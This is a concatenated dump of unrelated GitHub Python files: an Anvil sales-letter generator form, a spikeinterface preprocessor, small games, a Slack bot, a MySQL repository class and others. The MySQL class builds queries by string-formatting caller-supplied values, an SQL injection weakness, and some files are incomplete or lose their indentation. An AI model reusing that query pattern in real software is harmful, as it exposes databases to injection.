self.chosen_product_research = chosen_product_research\n self.chosen_tone = chosen_tone\n self.chosen_avatar = chosen_avatar\n self.chosen_script = chosen_script\n self.chosen_final_headline = chosen_final_headline\n self.chosen_final_subheadline = chosen_final_subheadline\n self.chosen_final_secondary_headline = chosen_final_secondary_headline\n\n\n####### --------VIDEO SALES LETTER SCRIPT --------###################################################\n\n def 
generate_vsl_script_button_click(self, **event_args):\n    with anvil.server.no_loading_indicator:\n      self.indeterminate_progress_vsl.visible = True\n\n      print(\"Generate Video Sales Letter Script button clicked\")\n      # Use the saved values from the dropdowns\n\n      current_user = anvil.users.get_user()\n      user_table_name = current_user['user_id']\n      # Get the table for the current user\n      user_table = getattr(app_tables, user_table_name)\n      vsl_row = user_table.get(variable='vsl_script')\n      \n      # Find the example script\n      row_chosen_script = user_table.search(variable='chosen_script')\n      \n      if row_chosen_script and row_chosen_script[0]['variable_title'] == 'Who, What, Where, How - 1':\n          example_wwwh_1_row = app_tables.example_scripts.get(script='wwwh_1')\n          example_script = example_wwwh_1_row['script_contents']\n      elif row_chosen_script and row_chosen_script[0]['variable_title'] == 'Who, What, Where, How - 2':\n          example_wwwh_2_row = app_tables.example_scripts.get(script='wwwh_2')\n          example_script = example_wwwh_2_row['script_contents']\n      elif self.chosen_script == 'Star, Story, Solution':\n          example_sss_row = app_tables.example_scripts.get(script='sss')\n          example_script = example_sss_row['script_contents']\n      \n      self.task_id = anvil.server.call('launch_generate_vsl_script', self.chosen_product_name, self.chosen_final_headline,self.chosen_final_subheadline, self.chosen_company_profile, self.chosen_product_research,self.chosen_avatar, self.chosen_tone, example_script)\n      print(\"Task ID:\", self.task_id)\n      # Launch the background task\n\n      # Loop to check the status of the background task\n      while True:\n        with anvil.server.no_loading_indicator:\n          # Check if the background task is complete\n          task_status = anvil.server.call('get_task_status', self.task_id)\n          print(\"Task status:\", task_status)\n\n          if task_status is not None:\n              if task_status == \"completed\":\n                  # Get the result of the background task\n                  vsl_script = anvil.server.call('get_task_result', self.task_id)\n\n                  # Update the variable_table with the JSON string\n                  vsl_row['variable_value'] = vsl_script\n                  vsl_row.update()\n\n                  # Populate the textbox with the generated script\n                  self.video_sales_script_textbox.text = vsl_script\n\n                  # Hide the progress bar\n                  self.indeterminate_progress_vsl.visible = False\n                  break # Exit the loop\n\n              elif task_status == \"failed\":\n                  # Handle the case where the background task failed\n                  print(\"Task failed\")\n                  break # Exit the loop\n\n          # Sleep for 1 second before checking again\n          time.sleep(1)\n\n# ####### --------VIDEO SALES LETTER THEMES --------###################################################\n  def generate_vsl_themes_button_click(self, **event_args):\n    with anvil.server.no_loading_indicator:\n      self.indeterminate_progress_vsl_themes.visible = True\n    # Check if the video sales script textbox is empty\n    if not self.video_sales_script_textbox.text:\n      anvil.js.window.alert(\"Please Create a Video Sales Script Before Generating your themes.\")\n      return \n    else:\n      current_user = anvil.users.get_user()\n      user_table_name = current_user['user_id']\n      # Get the table for the current user\n      user_table = getattr(app_tables, user_table_name)\n      \n      row = user_table.get(variable='vsl_themes')\n      vsl_theme_1_row = user_table.get(variable='vsl_theme_1')\n      vsl_theme_2_row = user_table.get(variable='vsl_theme_2')\n      vsl_theme_3_row = user_table.get(variable='vsl_theme_3')\n      vsl_theme_4_row = user_table.get(variable='vsl_theme_4')\n      \n      self.task_id = anvil.server.call('launch_generate_vsl_themes', self.chosen_final_headline, 
self.chosen_final_subheadline, self.chosen_product_name, self.chosen_product_research, self.chosen_tone,self.video_sales_script_textbox,row)\n print(\"Task ID:\", self.task_id)\n # Launch the background task\n \n # Loop to check the status of the background task\n while True:\n with anvil.server.no_loading_indicator:\n # Check if the background task is complete\n task_status = anvil.server.call('get_task_status', self.task_id)\n print(\"Task status:\", task_status)\n \n if task_status is not None:\n if task_status == \"completed\":\n # Get the result of the background task\n all_vsl_themes_json = anvil.server.call('get_task_result', self.task_id)\n \n if all_vsl_themes_json is not None:\n # Convert the JSON string back to a list\n all_vsl_themes = json.loads(all_vsl_themes_json)\n # Update the text boxes with the headlines\n self.vsl_theme_1.text = all_vsl_themes[0]\n self.vsl_theme_2.text = all_vsl_themes[1]\n self.vsl_theme_3.text = all_vsl_themes[2]\n self.vsl_theme_4.text = all_vsl_themes[3]\n \n # Update the rows in the 'variable' column of the 'mdia' table\n vsl_theme_1_row['variable_value'] = all_vsl_themes[0]\n vsl_theme_2_row['variable_value'] = all_vsl_themes[1]\n vsl_theme_3_row['variable_value'] = all_vsl_themes[2]\n vsl_theme_4_row['variable_value'] = all_vsl_themes[3]\n \n vsl_theme_1_row.update()\n vsl_theme_2_row.update()\n vsl_theme_3_row.update()\n vsl_theme_4_row.update()\n \n # Update the variable_table with the JSON string\n row['variable_value'] = all_vsl_themes_json\n row.update()\n else:\n print(\"Error: Row not found in user_table\")\n \n self.indeterminate_progress_vsl_themes.visible = False\n break # Exit the loop\n \n elif task_status == \"failed\":\n # Handle the case where the background task failed\n print(\"Task failed\")\n break # Exit the loop\n \n # Sleep for 1 second before checking again\n time.sleep(1)\n\n# #### ----- SAVING AND LOADING------------#########################################################################################################\n\n def edit_company_profile_component_click(self, **event_args):\n self.company_profile_textbox.read_only = False\n\n def save_vsl_script_component_click(self, **event_args):\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n row = user_table.get(variable='vsl_script')\n\n # Update the video sales column for the current user\n if row:\n text = self.video_sales_script_textbox.text\n row['variable_value'] = text\n row.update()\n else:\n # Handle case where the row does not exist for the current user\n print(\"No row found for the current user\")\n\n def save_vsl_themes_component_click(self, **event_args):\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n\n # Update vsl_theme_1\n vsl_theme_1_rows = user_table.search(variable='vsl_theme_1')\n if vsl_theme_1_rows:\n vsl_theme_1_row = vsl_theme_1_rows[0]\n vsl_theme_1_row['variable_value'] = self.vsl_theme_1.text\n vsl_theme_1_row.update()\n else:\n # Handle case where no rows are found for vsl_theme_1\n print(\"No row found for vsl_theme_1\")\n\n # Update vsl_theme_2\n vsl_theme_2_rows = user_table.search(variable='vsl_theme_2')\n if vsl_theme_2_rows:\n vsl_theme_2_row = vsl_theme_2_rows[0]\n vsl_theme_2_row['variable_value'] = self.vsl_theme_2.text\n vsl_theme_2_row.update()\n else:\n # Handle case where no 
rows are found for vsl_theme_2\n print(\"No row found for vsl_theme_2\")\n\n # Update vsl_theme_3\n vsl_theme_3_rows = user_table.search(variable='vsl_theme_3')\n if vsl_theme_3_rows:\n vsl_theme_3_row = vsl_theme_3_rows[0]\n vsl_theme_3_row['variable_value'] = self.vsl_theme_3.text\n vsl_theme_3_row.update()\n else:\n # Handle case where no rows are found for vsl_theme_3\n print(\"No row found for vsl_theme_3\")\n\n # Update vsl_theme_4\n vsl_theme_4_rows = user_table.search(variable='vsl_theme_4')\n if vsl_theme_4_rows:\n vsl_theme_4_row = vsl_theme_4_rows[0]\n vsl_theme_4_row['variable_value'] = self.vsl_theme_4.text\n vsl_theme_4_row.update()\n else:\n # Handle case where no rows are found for vsl_theme_4\n print(\"No row found for vsl_theme_4\")\n\n\n def load_vsl_themes_component_click(self, **event_args):\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n\n # Load vsl_theme_1\n vsl_theme_1_rows = user_table.search(variable='vsl_theme_1')\n if vsl_theme_1_rows:\n vsl_theme_1_row = vsl_theme_1_rows[0]\n self.vsl_theme_1.text = vsl_theme_1_row['variable_value']\n else:\n # Handle case where no rows are found for vsl_theme_1\n print(\"No row found for vsl_theme_1\")\n\n # Load vsl_theme_2\n vsl_theme_2_rows = user_table.search(variable='vsl_theme_2')\n if vsl_theme_2_rows:\n vsl_theme_2_row = vsl_theme_2_rows[0]\n self.vsl_theme_2.text = vsl_theme_2_row['variable_value']\n else:\n # Handle case where no rows are found for vsl_theme_2\n print(\"No row found for vsl_theme_2\")\n\n # Load vsl_theme_3\n vsl_theme_3_rows = user_table.search(variable='vsl_theme_3')\n if vsl_theme_3_rows:\n vsl_theme_3_row = vsl_theme_3_rows[0]\n self.vsl_theme_3.text = vsl_theme_3_row['variable_value']\n else:\n # Handle case where no rows are found for vsl_theme_3\n print(\"No row found for vsl_theme_3\")\n\n # Load vsl_theme_4\n vsl_theme_4_rows = user_table.search(variable='vsl_theme_4')\n if vsl_theme_4_rows:\n vsl_theme_4_row = vsl_theme_4_rows[0]\n self.vsl_theme_4.text = vsl_theme_4_row['variable_value']\n else:\n # Handle case where no rows are found for vsl_theme_4\n print(\"No row found for vsl_theme_4\")\n\n\n def save_chosen_headlines_button_click(self, **event_args):\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n\n final_headline_rows = user_table.search(variable='final_headline')\n if final_headline_rows:\n final_headline_row = final_headline_rows[0]\n final_headline_row['variable_value'] = self.main_headline_textbox.text\n final_headline_row.update()\n else:\n # Handle case where no rows are found for final_headline\n print(\"No row found for final_headline\")\n\n final_subheadline_rows = user_table.search(variable='final_subheadline')\n if final_subheadline_rows:\n final_subheadline_row = final_subheadline_rows[0]\n final_subheadline_row['variable_value'] = self.subheadline_textbox.text\n final_subheadline_row.update()\n else:\n # Handle case where no rows are found for final_subheadline\n print(\"No row found for final_subheadline\")\n\n final_secondary_headline_rows = user_table.search(variable='final_secondary_headline')\n if final_secondary_headline_rows:\n final_secondary_headline_row = final_secondary_headline_rows[0]\n final_secondary_headline_row['variable_value'] = self.secondary_headline_textbox.text\n 
final_secondary_headline_row.update()\n else:\n # Handle case where no rows are found for final_secondary_headline\n print(\"No row found for final_secondary_headline\")\n\n def load_vsl_script_component_click(self, **event_args):\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n\n load_vsl_rows = user_table.search(variable='vsl_script')\n if load_vsl_rows:\n loaded_vsl_script = load_vsl_rows[0]['variable_value']\n self.video_sales_script_textbox.text = loaded_vsl_script\n print(\"Contents:\", loaded_vsl_script)\n else:\n # Handle case where no rows are found for vsl_script\n print(\"No row found for vsl_script\")\n\n# ############################################################################################################\n# # NAVIGATION\n\n\n def nav_button_vsl_to_final_product_click(self, **event_args):\n # Check if any of the textboxes are empty\n if not self.vsl_theme_1.text or not self.vsl_theme_2.text or not self.vsl_theme_3.text or not self.vsl_theme_4.text:\n # If any of the vsl_theme textboxes are empty, show an alert\n anvil.js.window.alert(\"Please enter all 4 main theme excerpts before proceeding\")\n return\n else: \n anvil.open_form('FinalProduct')\n \n# NAVIGATION\n\n# # Define the function to navigate to the 'Company' form\n# def navigate_to_headlines(self, **event_args):\n# anvil.open_form('Company')\n\n # def finalproduct_page_link_click(self, **event_args):\n # finalproduct=FinalProduct()\n # self.content_panel.clear()\n # self.content_panel.add_component(finalproduct)\n\n\n#INTRO\n\n # # Get the rows for company profiles\n # company_profile_rows = [\n # user_table.search(variable='company_profile_1')[0],\n # user_table.search(variable='company_profile_2')[0],\n # user_table.search(variable='company_profile_3')[0]\n # ]\n # # Extract the values from the rows\n # company_profiles = [row['variable_title'] for row in company_profile_rows]\n # # Assign the values to the company_profile_dropdown\n # self.company_profile_dropdown.items = company_profiles\n\n \n\n # def nav_button_VSL_Elements_to_headline(self, **event_args):\n # headlines = Headlines()\n # self.content_panel.clear()\n # self.content_panel.add_component(headlines)\n\n def outlined_button_1_click(self, **event_args):\n \"\"\"This method is called when the button is clicked\"\"\"\n pass\n\n def nav_back_to_headlines(self, **event_args):\n anvil.open_form('Headlines')\n \n\n\n","repo_name":"TMoneyBidness/funnelwriter-3-5","sub_path":"client_code/VideoSalesLetter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":19213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44098228450","text":"\nfrom copy import deepcopy\nimport math\n\nfrom base import Manufacturable\n\n\ndef apply_blueprints_to_item(item, blueprints):\n \"\"\"\n Applies all of the blueprints to the item's ME * TE\n\n :param items: Item\n :type items: Manufacturable\n :param blueprints: Incoming body of {\n Item: {\"material_efficiency\": Value, \"time_efficiency\": Value}, ..\n }\n :type blueprints: dict\n :returns: Nothing\n :rtype: None\n \"\"\"\n\n item.set_material_efficiency(\n material_efficiency=blueprints.get(item, {}).get(\n \"material_efficiency\", 0\n )\n )\n item.set_time_efficiency(\n time_efficiency=blueprints.get(item, {}).get(\"time_efficiency\", 0)\n )\n\n\ndef apply_blueprints_to_multiple_items(items, blueprints):\n 
\"\"\"\n    Applies all of the blueprints to the items' ME * TE within the items dict\n\n    :param items: Incoming body of {Item: amount, ..}\n    :type items: dict\n    :param blueprints: Incoming body of {\n        Item: {\"material_efficiency\": Value, \"time_efficiency\": Value}, ..\n    }\n    :type blueprints: dict\n    :returns: Nothing\n    :rtype: None\n    \"\"\"\n\n    for item in items.keys():\n        apply_blueprints_to_item(item, blueprints)\n\n\ndef get_next_requirement(\n    item, number_of_runs=1, requirements={}, depth=0, blueprints={}\n):\n    \"\"\"\n    Returns a shopping list requirement of all materials needed to produce\n    the item in question (till depth is reached)\n\n    :param item: Item that is a requirement\n    :type item: MarketItem\n    :param number_of_runs: How many runs to do in order to complete the job\n    :type number_of_runs: int\n    :param requirements: What does it take to make this?\n        {MarketItem: amount}\n    :type requirements: dict\n    :param depth: How far down to go the requirements list\n        -1 goes till end\n        0 stops item.requirements\n        n goes till n == 0\n    :type depth: int\n    :param blueprints: Material/Time efficiency values for given blueprints\n    :type blueprints: dict\n    \"\"\"\n\n    # Copy so the caller's dict (or the shared mutable default) is never mutated\n    requirements = deepcopy(requirements)\n\n    apply_blueprints_to_item(item, blueprints)\n\n    for sub_item, amount in item.requirements.items():\n        amount *= number_of_runs\n        if (\n            isinstance(sub_item, Manufacturable) and\n            sub_item.requirements != {} and\n            depth != 0\n        ):\n            requirements = get_next_requirement(\n                sub_item,\n                number_of_runs=math.ceil(\n                    float(amount) / float(sub_item.produces)\n                ),\n                requirements=requirements,\n                depth=depth-1,\n                blueprints=blueprints\n            )\n\n        requirements.setdefault(sub_item, 0)\n        requirements[sub_item] += amount\n\n    return requirements\n","repo_name":"kusinwolf/indi-calc","sub_path":"costs.py","file_name":"costs.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"71603138409","text":"con, result = int(input()), []\r\n\r\nfor i in range(con):\r\n    expressao = input()\r\n    cont = 0\r\n\r\n    for c in expressao:\r\n        if c == '(': cont += 1\r\n        elif c == ')': cont -= 1\r\n        if cont < 0: break\r\n\r\n    if cont == 0: result.append(\"OK\")\r\n    else: result.append(\"NOK\")\r\n\r\nfor i,valor in enumerate(result):\r\n    if i != len(result) - 1: print(valor)\r\n    else: print(valor, end=\"\")\r\n","repo_name":"kaiquesouzasantos/estudos-python","sub_path":"Competicoes/MaratonaSaoJudas/abriuFechou.py","file_name":"abriuFechou.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"17888563257","text":"import numpy as np\nfrom spikeinterface.core import BaseRecording, BaseRecordingSegment\nfrom .basepreprocessor import BasePreprocessor, BasePreprocessorSegment\nfrom spikeinterface.core.core_tools import define_function_from_class\n\n\nclass DirectionalDerivativeRecording(BasePreprocessor):\n    name = \"directional_derivative\"\n    installed = True\n\n    def __init__(\n        self,\n        recording: BaseRecording,\n        direction: str = \"y\",\n        order: int = 1,\n        edge_order: int = 1,\n        dtype=\"float32\",\n    ):\n        \"\"\"Take derivative of any `order` along `direction`\n\n        np.gradient is applied independently along each column (direction='y')\n        or row (direction='x'). 
Accounts for channel spacings and boundary\n        issues using np.gradient -- see that function's documentation for\n        more information about `edge_order`.\n\n        When order=0, the column means are subtracted at each frame\n        (spatial common reference).\n\n        Parameters\n        ----------\n        recording : BaseRecording\n            recording to take the directional derivative of\n        direction : str\n            Gradients will be taken along this dimension.\n        order : int\n            np.gradient will be applied this many times.\n        edge_order : int\n            Order of gradient accuracy at edges; see np.gradient for details.\n        dtype : optional numpy dtype\n            If unset, parent dtype is preserved, but the derivative can\n            overflow or lose accuracy, so \"float32\" by default.\n        \"\"\"\n        parent_channel_locations = recording.get_channel_locations()\n        dim = [\"x\", \"y\", \"z\"].index(direction)\n        if dim > parent_channel_locations.shape[1]:\n            raise ValueError(f\"Direction {direction} not present in this recording.\")\n\n        # float32 by default if parent recording is integer\n        dtype_ = dtype\n        if dtype_ is None:\n            dtype_ = recording.dtype\n\n        BasePreprocessor.__init__(self, recording, dtype=dtype_)\n\n        for parent_segment in recording._recording_segments:\n            rec_segment = DirectionalDerivativeRecordingSegment(\n                parent_segment,\n                parent_channel_locations,\n                dim,\n                order,\n                edge_order,\n                dtype_,\n            )\n            self.add_recording_segment(rec_segment)\n\n        self._kwargs = dict(\n            recording=recording,\n            direction=direction,\n            order=order,\n            edge_order=edge_order,\n            dtype=dtype,\n        )\n\n\nclass DirectionalDerivativeRecordingSegment(BasePreprocessorSegment):\n    def __init__(\n        self,\n        parent_recording_segment: BaseRecordingSegment,\n        channel_locations: np.array,\n        dim: int,\n        order: int,\n        edge_order: int,\n        dtype,\n    ):\n        BasePreprocessorSegment.__init__(self, parent_recording_segment)\n        self.parent_recording_segment = parent_recording_segment\n        self.channel_locations = channel_locations\n        self.order = order\n        self.edge_order = edge_order\n        self.dim = dim\n        self._dtype = dtype\n\n        # get unique positions along dims other than `direction`\n        # channels at the same positions along these other dims are considered\n        # to belong to a \"column\"/\"row\", and the derivative is applied in these\n        # groups along `direction`\n        ndim = self.channel_locations.shape[1]\n        geom_other_dims = self.channel_locations[:, np.arange(ndim) != self.dim]\n        # column_inds is the column grouping by channel,\n        # so that geom_other_dims[i] == unique_pos_other_dims[column_inds[i]]\n        self.unique_pos_other_dims, self.column_inds = np.unique(geom_other_dims, axis=0, return_inverse=True)\n\n    def get_traces(self, start_frame, end_frame, channel_indices):\n        if start_frame is None:\n            start_frame = 0\n        if end_frame is None:\n            end_frame = self.get_num_samples()\n\n        parent_traces = self.parent_recording_segment.get_traces(\n            start_frame=start_frame,\n            end_frame=end_frame,\n            channel_indices=slice(None),\n        )\n        parent_traces = parent_traces.astype(self._dtype)\n\n        # calculate derivative independently in each column\n        derivative_traces = np.empty_like(parent_traces)\n        for column_ix, other_pos in enumerate(self.unique_pos_other_dims):\n            chans_in_column = np.flatnonzero(self.column_inds == column_ix)\n            dim_pos_in_column = self.channel_locations[chans_in_column, self.dim]\n\n            if dim_pos_in_column.size == 1:\n                column_traces = np.zeros((parent_traces.shape[0], 1), dtype=self._dtype)\n            else:\n                column_traces = parent_traces[:, chans_in_column]\n                for _ in range(self.order):\n                    column_traces = np.gradient(\n                        column_traces,\n                        dim_pos_in_column,\n                        axis=1,\n                        
edge_order=self.edge_order,\n                    )\n\n            # when order=0, do a spatial common reference\n            if self.order == 0:\n                column_traces -= column_traces.mean(axis=1, keepdims=True)\n\n            derivative_traces[:, chans_in_column] = column_traces\n\n        return derivative_traces\n\n\n# function for API\ndirectional_derivative = define_function_from_class(\n    source_class=DirectionalDerivativeRecording, name=\"directional_derivative\"\n)\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/preprocessing/directional_derivative.py","file_name":"directional_derivative.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"}
{"seq_id":"11212319504","text":"# Python Rock Paper Scissors Game\nimport random\nfrom enum import IntEnum\n\n# enum class to assign attributes to rock, paper, and scissors\nclass Hand(IntEnum):\n    rock = 1\n    paper = 2\n    scissors = 3\n\n\n# while-if block to determine the winner of the game.\nplay_again = False\nwhile not play_again:\n    # gets the player choice\n    player_choice = int(input(\"Please enter a number:\\nrock (1)\\npaper (2)\\nscissors (3)\\n\\n\"))\n    player_choice = Hand(player_choice)\n    # gets the computer choice from a list of choices\n    cpu_choice = Hand(random.randint(1, 3))\n    if cpu_choice == player_choice:\n        print(\"Tie! Go again!\")\n    # rock choice\n    elif player_choice == 1:\n        if cpu_choice == 2:\n            print(\"The Computer chose: \" + Hand(2).name + \"\\nSorry paper beats rock!\")\n            repeat = int(input(\"Would you like to play again (Please pick a number)?:\\n yes[0]\\nno[1]\"))\n            if repeat == 0:\n                play_again = False\n            else:\n                play_again = True\n        elif cpu_choice == 3:\n            print(\"The Computer chose: \" + Hand(3).name + \"\\nRock beats scissors CONGRATULATIONS!!! 
YOU WIN!\")\n            repeat = int(input(\"Would you like to play again (Please pick a number)?:\\n yes[0]\\nno[1]\"))\n            if repeat == 0:\n                play_again = False\n            else:\n                play_again = True\n\nprint(\"Thanks for playing!\")\n","repo_name":"khactigner/RockPaperScissors","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"30306536579","text":"\"\"\"\n    File: ricFlair.py\n    Version: 1.0.0\n    Author: Chris Baudouin, Jr.\n\n    Description: Anytime \"woo\" is mentioned in chat, abotimable will post a ric flair picture\n\"\"\"\nimport random\nimport re\nfrom .teamBotModule import TeamBotModule\n\n# Credit to the image owners\nrics = [\"https://i.pinimg.com/236x/63/47/83/634783c510e2564240db54ee141213e3--fighting-memes-ric-flair.jpg\",\n        \"https://img.buzzfeed.com/buzzfeed-static/static/2015-03/13/16/enhanced/webdr10/enhanced-buzz-1212-1426277573-14.jpg\",\n        \"https://i.ytimg.com/vi/XB21XNxtk5M/hqdefault.jpg\"]\n\n\nclass RicFlair():\n\n    def __init__(self):\n        pass\n\n    def check_for_woo(self, slack_client, message):\n        match_obj = re.match(r'wo{2,} *', message.text)\n        if match_obj:\n            rand = random.randint(0, len(rics)-1)\n            message_response = slack_client.api_call(\n                \"chat.postMessage\",\n                channel=message.channel,\n                attachments=[{\"fallback\": \"Required plain-text summary of the attachment.\",\n                              \"image_url\": rics[rand]}])\n\n    def notify_message(self, slack_client, message):\n        self.check_for_woo(slack_client, message)\n\n\nTeamBotModule.register(RicFlair)\n","repo_name":"Nitepone/abotimable","sub_path":"abotimable/ricFlair.py","file_name":"ricFlair.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"24245355952","text":"import pymysql\nimport sqlalchemy.pool as pool\nimport Constants\nimport os\nimport logging\nfrom error_handler import MessageException\n\n\nclass SQLRepo:\n    def __init__(self):\n        def get_conn():\n            connection = pymysql.connect(user=str(os.environ['DB_USER']), password=str(os.environ['DB_PASSWORD']),\n                                         db=str(os.environ['DB_NAME']), host=str(os.environ['DB_HOST']))\n            return connection\n\n        # defining connection pool\n        self.mypool = pool.QueuePool(get_conn, max_overflow=Constants.MAX_OVERFLOW, pool_size=Constants.POOL_SIZE)\n\n    def add_message_request(self, message_no: int, arrival_time: str, transmission_time: str):\n        \"\"\"\n        Function to add message request to db\n\n        :param message_no: int: message number\n        :param arrival_time: str: arrival time of the message request\n        :param transmission_time: str: transmission time of the message request from producer\n        :return:\n        \"\"\"\n        conn = self.mypool.connect()\n        cursor = conn.cursor()\n        try:\n            cursor.execute(\n                \"INSERT IGNORE INTO consumer VALUES ({message_no},'{transmission_time}','{arrival_time}')\".format(\n                    message_no=int(message_no), arrival_time=arrival_time, transmission_time=transmission_time))\n            conn.commit()\n        except pymysql.Error as e:\n            logging.error(\"cannot perform a query to insert data\")\n            logging.error(e)\n            raise e\n        finally:\n            cursor.close()\n            conn.close()\n        return True\n\n    def get_max_message_number(self):\n        \"\"\"\n        Function to get max message number till now\n\n        :return: int: message number\n        \"\"\"\n        conn = self.mypool.connect()\n        cursor = conn.cursor()\n\n        try:\n            max_message_query = \"SELECT MAX(message_no) as max_number from consumer\"\n            cursor.execute(max_message_query)\n            result = 
cursor.fetchone()\n\n if result:\n return result[0]\n else:\n return 0\n except pymysql.Error as e:\n logging.error(\"cannot perform a query pymysql\")\n logging.error(e)\n raise e\n finally:\n cursor.close()\n conn.close()\n\n def avg_time(self, seconds: int = 10):\n \"\"\"\n Function to get average time based on seconds\n\n :param seconds: int:\n :return: int: average time of transmission of messages in last {seconds} seconds\n \"\"\"\n conn = self.mypool.connect()\n cursor = conn.cursor()\n\n try:\n avg_time_query = f\"\"\"SELECT AVG(arrival_time - transmission_time) as avg_time\n FROM consumer\n WHERE arrival_time >= (now() - interval {seconds} second)\"\"\"\n logging.info(avg_time_query)\n\n cursor.execute(avg_time_query)\n result = cursor.fetchone()\n\n if result and result[0]:\n return \"{:.4f}\".format(round(float(str(result[0])), 4))\n else:\n return 0\n except pymysql.Error as e:\n logging.error(\"cannot perform a query\")\n logging.error(e)\n raise e\n finally:\n cursor.close()\n conn.close()\n","repo_name":"anipshah/Producer-Redis-Consumer-MySQL-React","sub_path":"consumer/repository/SQLRepo.py","file_name":"SQLRepo.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71679549927","text":"import pygame\nimport sys\nfrom pygame.locals import *\n\ndef main():\n pygame.init()\n FPS = 30\n fpsClock = pygame.time.Clock()\n\n window_size = (0, 0)\n screen = pygame.display.set_mode(window_size)\n\n pygame.display.set_caption(\"Making Stuff Move\")\n\n WHITE = pygame.Color(255, 255, 255)\n GOLD = pygame.Color(255, 215, 0)\n RED = pygame.Color(255, 0, 0)\n\n screen.fill(WHITE)\n colors_for_house = {'house': GOLD, 'roof': RED}\n\n house = House(200, 200, 100, colors_for_house)\n house.draw(screen)\n\n move_up = False;\n move_down = False;\n move_left = False;\n move_right = False;\n\n while True: # <--- main game loop\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n if event.type == KEYDOWN:\n if event.key == K_UP:\n move_up = True\n if event.key == K_DOWN:\n move_down = True\n if event.key == K_LEFT:\n move_left = True\n if event.key == K_RIGHT:\n move_right = True\n\n if event.type == KEYUP:\n if event.key == K_UP:\n move_up = False\n if event.key == K_DOWN:\n move_down = False\n if event.key == K_LEFT:\n move_left = False\n if event.key == K_RIGHT:\n move_right = False\n\n if move_up:\n house.changeY(-10)\n if move_down:\n house.changeY(10)\n if move_left:\n house.changeX(-10)\n if move_right:\n house.changeX(10)\n\n # redraw the background and house each frame\n screen.fill(WHITE)\n house.draw(screen)\n pygame.display.update()\n fpsClock.tick(FPS)\n\nclass House:\n\n def __init__(self, x, y, size, colors):\n self.x = x\n self.y = y\n self.size = size\n self.colors = colors\n\n def draw(self, screen):\n pygame.draw.rect(screen, self.colors['house'], [self.x, self.y, self.size, self.size] )\n self.__draw_roof(screen)\n\n def __draw_roof(self, screen):\n pointlist = [ (self.x - 20, self.y), (self.x + self.size + 20, self.y), (self.x + 100, self.y - 100)]\n\n pygame.draw.polygon(screen, self.colors['roof'], pointlist)\n\n def changeX(self, inc):\n self.x += inc;\n\n def changeY(self, inc):\n self.y += inc;\n\nif __name__ == \"__main__\":\n main()","repo_name":"calstatelaacm/lets_learn_python_with_pygame","sub_path":"pygame/3 Making Stuff 
Move/making_stuff_move.py","file_name":"making_stuff_move.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"71080104167","text":"from django.urls import path\n\nfrom users.views import login_view, AlternativeLoginView, AnotherLogoutView\n\n\nurlpatterns = [\n    path('login/', login_view, name='login'),\n    # An extra login form built with the dedicated LoginView class-based view. Purely for testing.\n    path('alternative_login/', AlternativeLoginView.as_view(), name='alternative_login'),\n    path('logout/', AnotherLogoutView.as_view(), name='logout'),\n]","repo_name":"igor-kushnarenko/hardware_accounting","sub_path":"hardware/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"38633571458","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 13 13:43:41 2016\n\n@author: mje\n\"\"\"\nimport pandas as pd\nimport mne\n\n\nfor subject in subjects:\n    raw = mne.io.Raw(maxfiltered_folder + \"%s_data_mc_raw_tsss.fif\" % subject)\n    events = mne.find_events(raw, min_duration=0.01)\n    mne.write_events(log_folder + \"%s-eve.fif\" % subject, events) \n\n\nfor subject in subjects:\n    df = make_log_file(subject)\n    df.to_csv(log_folder + \"%s_log_file.csv\" %subject, index=False)\n    \nresults = pd.DataFrame()\nfor subject in subjects:\n    df = pd.read_csv(log_folder + \"%s_log_file.csv\" %subject)\n    df[\"subject\"] = subject\n    \n    results = results.append(df, ignore_index=True)\n    \n","repo_name":"MadsJensen/malthe_alpha_project","sub_path":"log_file_wrapper.py","file_name":"log_file_wrapper.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
